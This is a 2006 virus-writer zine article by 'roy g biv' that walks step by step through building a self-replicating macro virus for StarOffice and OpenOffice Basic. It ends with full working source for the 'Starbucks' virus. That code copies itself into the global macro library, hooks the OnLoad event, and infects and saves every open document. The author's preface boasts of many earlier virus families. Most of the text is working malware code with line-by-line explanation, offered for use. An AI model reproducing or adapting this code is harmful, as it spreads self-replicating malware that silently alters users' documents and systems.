RRLF ZINE ISSUE SEVEN

The StarOffice Basic
by roy g biv
                            The StarOffice Basic
                             roy g biv / Defjam

Former  DOS/Win16  virus writer, author of several virus  families,  including
Ginger  (see Coderz #1 zine for terrible buggy example, contact me for  better
sources  ;),  and Virus Bulletin 9/95 for a description of what   they  called
Rainbow.   Co-author  of  world's first virus using circular  partition  trick
(Orsam, coded with Prototype in 1993).  Designer of world's first XMS swapping
virus  (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the rest is
swapped  out).   Author of world's first virus using Thread Local Storage  for
replication  (Shrug, see Virus Bulletin 6/02 for a description, but they  call
it Chiton), world's first virus using Visual Basic 5/6 language extensions for
replication  (OU812), world's first Native executable virus (Chthon),  world's
first  virus  using process co-operation to prevent termination  (Gemini,  see
Virus  Bulletin 9/02 for a description), world's first virus using polymorphic
SMTP  headers (JunkMail, see Virus Bulletin 11/02 for a description),  world's
first viruses that can convert any data files to infectable objects (Pretext),
world's  first  32/64-bit  parasitic  EPO .NET  virus  (Croissant,  see  Virus
Bulletin  11/04  for a description, but they call it Impanate), world's  first
virus  using  self-executing HTML (JunkHTMaiL, see Virus Bulletin 7/03  for  a
description), world's first virus for Win64 on Intel Itanium (Shrug, see Virus
Bulletin 6/04 for a description, but they call it Rugrat), world's first virus
for  Win64 on AMD AMD64 (Shrug), world's first cross-infecting virus for Intel
IA32  and  AMD  AMD64  (Shrug),  world's  first  viruses  that  infect  Office
applications  and  script  files  using the same  code  (Macaroni,  see  Virus
Bulletin  11/05  for  a description, but they call it Macar),  world's   first
viruses  that  can infect both VBS and JScript using the same code (ACDC,  see
Virus  Bulletin 11/05 for a description, but they call it Cada), world's first
IDA  plugin  virus (Hidan), and world's first viruses that use  the  Microsoft
Script  Encoder  to  dynamically encrypt the virus body (Screed).   Author  of
various  retrovirus  articles (eg see Vlad #7 for the strings that  make  your
code  invisible to TBScan).  Went to sleep for a number  of years.  This is my
first  virus for StarOffice and OpenOffice.  It is the world's first virus for
StarOffice and OpenOffice.


StarOffice Basic

StarOffice  has its own language called StarOffice Basic, which is similar  to
VBA  for Microsoft Office.  OpenOffice has its own language called  OpenOffice
Basic,  which is almost identical to StarOffice Basic.  The language is shared
among  all of the StarOffice or OpenOffice applications, so it is very easy to
make a cross-platform virus.

Of course, some things are different, so let's cover some of them here.

In VBA, we have the Application object that is our global container.
In StarOffice and OpenOffice, we have the GlobalScope object.
In VBA, we have the VBE.ActiveVBProject.VBComponents object.
In StarOffice and OpenOffice, we have the BasicLibraries.getByName("Standard")
object.
In VBA, we get our source from Item("Module1").CodeModule.
In StarOffice and OpenOffice, we get our source from getbyname("Module1").
In VBA, we can add a macro by the AddFromString method.
In StarOffice and OpenOffice, we can add a macro by the insertbyname method.

The  list  would be very big to cover everything, but the important  thing  to
know  is  that with one Basic for all applications, StarOffice and  OpenOffice
are so much simpler to use (and infect).


Step-By-Step

Now let's look at some source code and talk about how it works.
We get access to the global template module this way:

    a = GlobalScope.BasicLibraries.getByName("Standard")

We get access to our code module this way:

    b = "Starbucks"
    c = BasicLibraries.getByName("Standard").getByName(b)

We can check if our code is present in the global module this way:

    if not a.hasByName(b) then

We can add our code to the global module this way:

        a.insertByName b, c

Now we want to infect all open files.  We get the list this way:

    e = CreateUnoService("com.sun.star.frame.Desktop").getComponents

However,  in  order to examine the items in the list, we need  an  enumeration
object.  We create one this way:

    f = e.createEnumeration

We check if we are at the end of the list this way:

    while f.hasMoreElements

We enumerate the items this way:

        g = f.nextElement

For each object returned by the enumeration, we get access to the macro module
this way:

        h = g.BasicLibraries.getByName("Standard")

We check if it is infected already this way:

        if not h.hasByName(b) then

We add our code to the current document this way:

            h.insertByName b, c

We save the infected document this way:

            g.store

So  easy.   Now we need to get control somehow.  We can do that by hooking  an
event.  In VBA, we use such special macro names as AutoOpen() and AutoClose().
In StarOffice and OpenOffice, it's done by changing the event property.

The  events are sequences of properties, so we need to construct the  property
list first.  We do it this way:

    dim d(1) as new com.sun.star.beans.PropertyValue
    d(0).name="EventType"
    d(0).value="StarBasic"
    d(1).name="Script"

Then we decide if we are adding to the global template or the local document.
For the global template, it looks like this:

    d(1).value="macro:///Standard.Module.Method()"

For the local document, it looks like this:

    d(1).value="macro://./Standard.Module.Method()"

The Module and Method names can be changed to whatever we want to use.
To replace a global template event, we do it this way:

    createUnoService("com.sun.star.frame.GlobalEventBroadcaster").Events.replaceByName "OnLoad", d()

For the local document, we do it this way:

    g.Events.replaceByName "OnLoad", d()

Of course, the OnLoad event can be changed to other things, like OnSave, etc.
Now let's put it all together:

    Sub Starbucks 'roy g biv - 06/06/06
    a = GlobalScope.BasicLibraries.getByName("Standard")
    b = "Starbucks"
    c = BasicLibraries.getByName("Standard").getByName(b)
    dim d(1) as new com.sun.star.beans.PropertyValue
    d(0).name = "EventType"
    d(0).value = "StarBasic"
    d(1).name = "Script"
    e = "macro://"
    f = "/Standard." + b + "." + b + "()"
    d(1).value = e + f

    if not a.hasByName(b) then
        a.insertByName b, c
        createUnoService("com.sun.star.frame.GlobalEventBroadcaster").Events.replaceByName "OnLoad", d()
    end if

    d(1).value = e + "." + f
    e = createUnoService("com.sun.star.frame.Desktop").getComponents.createEnumeration
    on error goto skip

    while e.hasMoreElements
        f = e.nextElement
        g = f.BasicLibraries.getByName("Standard")

        if not g.hasByName(b) then
            g.insertByName b, c
            f.Events.replaceByName "OnLoad", d()
            f.store
        end if

    skip:
    wend
    End Sub

That's it.  In 30 lines, we infect all StarOffice and OpenOffice applications.


Greets to friendly people (A-Z):

Active - Benny - Obleak - Prototype - Ratter - Ronin - RT Fishel -
sars - SPTH - The Gingerbread Man - Ultras - uNdErX - Vallez - Vecna -
VirusBuster - Whitehead


rgb/defjam jun 2006
iam_rgb@hotmail.com